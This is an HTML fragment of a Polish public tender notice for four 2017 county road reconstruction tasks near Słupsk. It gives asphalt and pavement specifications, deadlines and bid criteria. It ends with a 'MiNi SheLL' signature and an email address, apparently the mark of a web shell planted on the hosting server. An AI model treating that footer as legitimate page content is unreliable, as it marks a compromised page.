              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zadanie nr 1:  Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis robót dla zadania nr 1: Przebudowa drogi powiatowej nr 1170G na odcinku Lubuń- Żelkówko (gm.Kobylnica) 
Przedmiotem zamówienia w/w zadania nr 1 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1170G (Kwakowo  Lubuń  Żelkówko) od km 6+660 do km 8+460 na odcinku Lubuń  Żelkówko na łącznej długości 1,80km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej na jezdni o szerokości 4,0m o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 1 jest do 31 sierpnia 2017 r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zadanie nr 2: Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis robót dla zadania nr 2:  Przebudowa drogi powiatowej nr 1150G relacji Słonowiczki- Kczewo- Bzowo- Tychowo do granic administrac. powiatu słupskiego- etap II ( gm.Kobylnica) 
Przedmiotem zamówienia w/w zadania nr 2 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1150G (Tychowo  Słonowiczki) od km 2+850 do km 4+850 na odcinku Bzowo  Słonowiczki na łącznej długości 2,00km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej na jezdni o szerokości 4,0m o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 2 jest do 31 sierpnia 2017 r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>zadanie nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis robót dla zadania nr 3: Przebudowa drogi powiatowej nr 1144G na odcinku Wykosowo do drogi wojewódzkiej nr 213 (gm.Główczyce)
Przedmiotem zamówienia w/w zadania nr 3 jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1144G (od dr. wojewódzkiej nr 213  Wykosowo  Jeziorka) od km 0+000 do km 0+950 na odcinku od dr. wojewódzkiej nr 213  Wykosowo na łącznej długości 0,95km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Chodnika z kostki betonowej o konstrukcji w obramowaniu z obrzeża betonowego 8x30cm  na podsypce cementowo  piaskowej z oporem i krawężnika betonowego 15x30 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 6cm,
- podsypka cementowo  piaskowa 5cm,
- warstwa odcinająca z pospółki 10cm.
3. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
4. Poboczy umocnionych płytami żelbetowymi 100x75x12cm ułożonych na warstwie kruszywa łamanego o grubości 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.
Termin wykonania robót dla zad. nr 3 jest do 31 lipca 2017 r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>zadanie nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Opis robót dla zadania nr 4: Przebudowa drogi powiatowej nr 1181G Górzyno- Nieckowo (gm.Potęgowo) 
Przedmiotem zamówienia w/w zadania nr 4 jest wykonanie Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1181G (Górzyno  Nieckowo) z podziałem na dwa odcinki: od km 2+500 do km 3+200 na odcinku  od m. Radosław w kierunku m. Nieckowo i od km 4+050 do km 4+300 w m. Nieckowo na łącznej długości 0,95km.
W ramach przebudowy przewidziano wykonanie:
1. Nawierzchni bitumicznej o konstrukcji:
- warstwa wyrównawcza z betonu asfaltowego AC16W KR 36 gr. śr. 2cm,
- warstwa wiążąca z betonu asfaltowego AC16W KR 3-6 gr. 4cm,
- warstwa ścieralna z betonu asfaltowego AC11S KR 3-6 gr. 4cm,
2. Chodnika w m. Nieckowo z kostki betonowej o konstrukcji w obramowaniu z obrzeża betonowego 8x30cm  na podsypce cementowo  piaskowej z oporem i krawężnika betonowego 15x30 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 6cm,
- podsypka cementowo  piaskowa 5cm,
- warstwa odcinająca z pospółki 10cm.
3. Zjazdów na posesje w m. Nieckowo o konstrukcji w obramowaniu z krawężnika betonowego 15x22 na ławie betonowej z oporem o konstrukcji :
- kostka brukowa betonowa 8cm,
- podsypka cementowo  piaskowa 3cm,
- podbudowa z kruszywa łamanego 0/31,5 20cm
- warstwa odcinająca z pospółki 20cm.
4. Poboczy z kruszywa łamanego 0/31,5 o szerokości 1,0m i gr. 10cm.
W ramach zadania Wykonawca robót zobowiązany będzie do prowadzenia robót w taki sposób aby utrzymać przejezdność odcinka drogi przewidzianego do przebudowy przez cały okres realizacji prac. Dopuszczalne będzie wyłączenie dla ruchu samochodowego odcinków drogi w przypadku gdy przyjęta technologia wykonywania robót bitumicznych obejmować będzie wykonywanie robót całą szerokością jezdni bez złącza w osi jezdni. W takim przypadku Wykonawca wyznaczy objazd odcinków wyłączonych z ruchu. Po stronie Wykonawcy będzie również bieżące uzupełnianie ubytków w jezdni bitumicznej odcinka drogi przekazanego pod inwestycję dla zapewnienia bezpieczeństwa uczestników ruchu drogowego.

Termin wykonania robót dla zad. nr 4 jest do 29 września 2017 r.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 45233220-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com